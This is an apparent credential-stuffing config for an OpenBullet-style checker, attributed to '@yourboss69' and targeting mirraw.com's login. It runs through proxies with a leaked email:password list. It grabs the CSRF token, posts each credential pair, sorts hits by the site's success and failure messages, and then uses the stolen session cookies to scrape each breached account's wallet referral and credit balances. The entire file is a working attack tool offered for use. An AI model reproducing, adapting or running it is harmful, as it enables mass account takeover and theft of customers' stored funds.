[SETTINGS]
{
  "Name": "mirraw @yourboss69",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-31T16:36:10.5927599+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@yourboss69",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "mirraw",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.mirraw.com/accounts/sign_in" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<meta name=\"csrf-token\" content=\"" "\"" -> VAR "csrf" 

REQUEST POST "https://www.mirraw.com/accounts/sign_in" 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<csrf>&account%5Bemail%5D=<USER>&account%5Bpassword%5D=<PASS>&account%5Bremember_me%5D=0&commit=SIGN+IN" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.mirraw.com" 
  HEADER "referer: https://www.mirraw.com/accounts/sign_in" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password." 
  KEYCHAIN Success OR 
    KEY "Signed in successfully." 

PARSE "<SOURCE>" LR "href=\"/user/" "/orders\"" -> VAR "id" 

PARSE "<COOKIES(unbxd.userId)>" LR "" "" -> VAR "uid" 

PARSE "<COOKIES(_mirraw_session)>" LR "" "" -> VAR "sess" 

REQUEST GET "https://www.mirraw.com/user/<id>/wallet" 
  
  COOKIE "unbxd.userId: <uid>" 
  COOKIE "_mirraw_session: <sess>" 
  HEADER "referer: https://www.mirraw.com/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36" 

PARSE "<SOURCE>" LR "Referral Amount" "&#x25BE;" -> VAR "ref" 

PARSE "<ref>" LR "<div class='option-value'>" "<span>" CreateEmpty=FALSE -> CAP "Referral Amount" 

PARSE "<SOURCE>" LR "<div class='panel_content'>" "</div>" CreateEmpty=FALSE -> CAP "Credit amount" 

FUNCTION Constant "@yourboss69" -> CAP "Config by" 

